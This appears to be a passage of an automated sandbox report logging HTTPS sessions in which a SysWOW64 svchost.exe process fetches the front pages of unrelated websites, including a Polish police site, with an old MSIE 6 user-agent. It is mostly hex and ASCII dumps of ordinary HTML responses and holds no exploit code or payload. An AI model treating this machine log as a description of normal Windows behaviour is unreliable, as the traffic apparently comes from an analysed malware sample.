                                                                                                                                                                              2023-09-15 05:27:42 UTC3053INData Raw: 20 30 20 31 20 31 36 20 34 27 2f 25 33 45 20 20 20 25 33 43 70 61 74 68 20 64 3d 27 4d 31 36 20 30 20 41 31 36 20 31 36 20 30 20 30 20 31 20 33 32 20 31 36 20 4c 32 38 20 31 36 20 41 31 32 20 31 32 20 30 20 30 20 30 20 31 36 20 34 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 54 72 61 6e 73 66 6f 72 6d 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 74 72 61 6e 73 66 6f 72 6d 27 20 74 79 70 65 3d 27 72 6f 74 61 74 65 27 20 66 72 6f 6d 3d 27 30 20 31 36 20 31 36 27 20 74 6f 3d 27 33 36 30 20 31 36 20 31 36 27 20 64 75 72 3d 27 30 2e 38 73 27 20 72 65 70 65 61 74 43 6f 75 6e 74 3d 27 69 6e 64 65 66 69 6e 69 74 65 27 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 25 33 43 2f 73 76 67 25 33 45 22 29 3b 0a 7d 0a 2e 68 6f 75 72 67 6c
                                                                                                                                                                              Data Ascii: 0 1 16 4'/%3E %3Cpath d='M16 0 A16 16 0 0 1 32 16 L28 16 A12 12 0 0 0 16 4z'%3E %3CanimateTransform attributeName='transform' type='rotate' from='0 16 16' to='360 16 16' dur='0.8s' repeatCount='indefinite' /%3E %3C/path%3E %3C/svg%3E");}.hourgl
                                                                                                                                                                              2023-09-15 05:27:42 UTC3061INData Raw: 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 6b 62 73 5f 73 63 72 69 70 74 73 3d 7b 22 61 6a 61 78 5f 6c 6f 61 64 65 72 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 63 6f 6e 74 65 6e 74 5c 2f 70 6c 75 67 69 6e 73 5c 2f 6b 62 2d 73 75 70 70 6f 72 74 5c 2f 61 73 73 65 74 73 5c 2f 69 6d 61 67 65 73 5c 2f 6c 6f 61 64 69 6e 67 2e 67 69 66 22 2c 22 61 6a 61 78 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 68 6f 6e 65 79 70 6f 74 5f 66 61 69 6c 22 3a 22 48 6f 6e 65 79 70 6f 74 20 76 61 6c 69 64 61 74 69 6f 6e
                                                                                                                                                                              Data Ascii: type='text/javascript'>//<![CDATA[var kbs_scripts={"ajax_loader":"https:\/\/dataform.co.uk\/wp-content\/plugins\/kb-support\/assets\/images\/loading.gif","ajaxurl":"https:\/\/dataform.co.uk\/wp-admin\/admin-ajax.php","honeypot_fail":"Honeypot validation
                                                                                                                                                                              2023-09-15 05:27:42 UTC3069INData Raw: 69 64 74 68 3a 31 30 30 25 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 6d 61 72 67 69 6e 3a 35 70 78 20 30 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 23 73 69 74 65 2d 6c 61 6e 67 75 61 67 65 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 2e 70 72 65 66 69 78 5f 61 64 64 72 65 73 73 2c 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 2e 73 75 66 66 69 78 5f 61 64 64 72 65 73 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 6d 75 5f 72 65 67 69 73 74 65 72 20 6c 61 62 65 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 7d 2e 6d 75 5f 72 65 67 69 73
                                                                                                                                                                              Data Ascii: idth:100%;font-size:24px;margin:5px 0}.mu_register #site-language{display:block}.mu_register .prefix_address,.mu_register .suffix_address{font-size:18px;display:inline}.mu_register label{font-weight:700;font-size:15px;display:block;margin:10px 0}.mu_regis
                                                                                                                                                                              2023-09-15 05:27:42 UTC3077INData Raw: 67 69 6e 2f 22 20 63 6c 61 73 73 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 69 6e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 61 72 65 61 20 73 68 6f 77 2d 6f 6e 2d 64 65 73 6b 74 6f 70 20 68 69 64 65 2d 6f 6e 2d 66 69 72 73 74 2d 73 77 69 74 63 68 20 68 69 64 65 2d 6f 6e 2d 73 65 63 6f 6e 64 2d 73 77 69 74 63 68 22 3e 3c 70 3e 3c 61 20 63 6c 61 73 73 3d 22 64 65 66 61 75 6c 74 2d 62 74 6e 2d 73 68 6f 72 74 63 6f 64 65 20 76 63 5f 67 65 6e 65 72 61 6c 20 76 63 5f 62 74 6e 33 20 76 63 5f 62 74 6e 33 2d 73 69 7a 65 2d 6d 64 20 76 63 5f 62 74 6e 33 2d 73 68 61 70 65 2d 72 6f 75 6e 64 65 64 20 76 63 5f 62 74 6e 33 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 76 63 5f 62 74 6e 33 2d 63 6f 6c 6f 72 2d 77 68 69 74 65 22 20 68 72
                                                                                                                                                                              Data Ascii: gin/" class="submit">Login</a></div><div class="text-area show-on-desktop hide-on-first-switch hide-on-second-switch"><p><a class="default-btn-shortcode vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-rounded vc_btn3-style-outline vc_btn3-color-white" hr
                                                                                                                                                                              2023-09-15 05:27:42 UTC3085INData Raw: 74 69 6d 65 72 49 44 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66 61 6c 73 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 68 6f 77 74 69 6d 65 28 29 7b 76 61 72 20 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 29 3b 76 61 72 20 6d 79 3d 6e 6f 77 2e 67 65 74 54 69 6d 65 28 29 3b 6e 6f 77 3d 6e 65 77 20 44 61 74 65 28 6d 79 2d 64 69 66 66 6d 73 29 3b 74 69 6d 65 72 49 44 3d 73 65 74 54 69 6d 65 6f 75 74 28 27 73 68 6f 77 74 69 6d 65 28 29 27 2c 31 30 30 30 30 29 3b 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 74 72 75 65 3b 7d 0a 66 75 6e 63 74 69 6f 6e 20 73 74 61 72 74 63 6c 6f 63 6b 28 29 7b 73 74 6f 70 63 6c 6f 63 6b 28 29 3b 73 68 6f 77 74 69 6d 65 28 29 3b 7d 0a 76 61 72 20 74 69 6d 65 72 49 44 3d 6e 75 6c 6c 3b 76 61 72 20 74 69 6d 65 72 52 75 6e 6e 69 6e 67 3d 66
                                                                                                                                                                              Data Ascii: timerID);timerRunning=false;}function showtime(){var now=new Date();var my=now.getTime();now=new Date(my-diffms);timerID=setTimeout('showtime()',10000);timerRunning=true;}function startclock(){stopclock();showtime();}var timerID=null;var timerRunning=f


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              17192.168.2.364256185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2904OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: techtrans.de
                                                                                                                                                                              2023-09-15 05:27:42 UTC2905INHTTP/1.1 403 Forbidden
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                              Expires: 0
                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                              Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                              Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                              Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                              Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                              X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              2023-09-15 05:27:42 UTC2906INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                              Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              18192.168.2.36410291.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2904OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: pleszew.policja.gov.pl
                                                                                                                                                                              2023-09-15 05:27:42 UTC2909INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:47 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              2023-09-15 05:27:42 UTC2909INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                              Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                              2023-09-15 05:27:42 UTC2970INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 0d 0a 32 30 30 30 0d 0a 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d
                                                                                                                                                                              Data Ascii: </div> </article> </section> </section></div>... topnews. -->... content --><div 2000id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci -
                                                                                                                                                                              2023-09-15 05:27:42 UTC2986INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2e 67 69 66 3f 76 3d 31 36 35 37 0d 0a 31 30 30 30 0d 0a 31 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68
                                                                                                                                                                              Data Ascii: margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html" target="_top" aria-label="Guchoniemi"><img src="/dokumenty/batony/4104.gif?v=16571000112618" alt="Guchoniemi" aria-hidden="true" /></a></div><div class="item" style="width
                                                                                                                                                                              2023-09-15 05:27:42 UTC3002INData Raw: 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 0d 0a 31 36 36 0d 0a 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74
                                                                                                                                                                              Data Ascii: <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul> <div class="clea166r"></div> </div> </div> </footer> ... foot


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              19192.168.2.364377172.67.164.178443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2904OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: clinicasanluis.com.co
                                                                                                                                                                              2023-09-15 05:27:42 UTC2925INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              location: https://www.clinicasanluis.com.co/
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VbV5GXromAyzt7PGYowX%2FJSSq6bSGX%2FMlI38ZnutOAVNvOFhIZO52q%2BMlYD4dOZv9nwlIKWSR7ffI2D7MHiPa3tvWvofVny9yGFFPpMFmwBNuRjlsPnqiTMU4yeJVSBlesYhzTG8z60%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 806e76485fb30c8c-EWR
                                                                                                                                                                              2023-09-15 05:27:42 UTC2925INData Raw: 32 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c
                                                                                                                                                                              Data Ascii: 2c3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial,
                                                                                                                                                                              2023-09-15 05:27:42 UTC2926INData Raw: 3e 0a 0d 0a
                                                                                                                                                                              Data Ascii: >
                                                                                                                                                                              2023-09-15 05:27:42 UTC2926INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              2192.168.2.35015791.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:23 UTC0OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: pleszew.policja.gov.pl
                                                                                                                                                                              2023-09-15 05:27:23 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:29 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              2023-09-15 05:27:23 UTC2INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                              Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                              2023-09-15 05:27:23 UTC19INData Raw: 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 0d 0a 32 30 30 30 0d 0a 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d
                                                                                                                                                                              Data Ascii: </div> </article> </section> </section></div>... topnews. -->... content --><div 2000id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktualnosci -
                                                                                                                                                                              2023-09-15 05:27:23 UTC35INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2c 47 6c 75 63 68 6f 6e 69 65 6d 69 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 31 30 34 2e 67 69 66 3f 76 3d 31 36 35 37 0d 0a 31 30 30 30 0d 0a 31 31 32 36 31 38 22 20 61 6c 74 3d 22 47 c5 82 75 63 68 6f 6e 69 65 6d 69 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68
                                                                                                                                                                              Data Ascii: margin-bottom:10px"><a href="/w20/batony/4104,Gluchoniemi.html" target="_top" aria-label="Guchoniemi"><img src="/dokumenty/batony/4104.gif?v=16571000112618" alt="Guchoniemi" aria-hidden="true" /></a></div><div class="item" style="width
                                                                                                                                                                              2023-09-15 05:27:23 UTC51INData Raw: 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 0d 0a 31 36 36 0d 0a 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74
                                                                                                                                                                              Data Ascii: <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul> <div class="clea166r"></div> </div> </div> </footer> ... foot


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                              20192.168.2.36413449.212.235.175443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                              2023-09-15 05:27:42 UTC2904OUTGET / HTTP/1.1
                                                                                                                                                                              Accept: *
                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Host: nts-web.net
                                                                                                                                                                              2023-09-15 05:27:42 UTC3002INHTTP/1.1 200 OK
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Fri, 15 Sep 2023 05:27:42 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 2599149
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Last-Modified: Tue, 08 Nov 2022 00:53:41 GMT
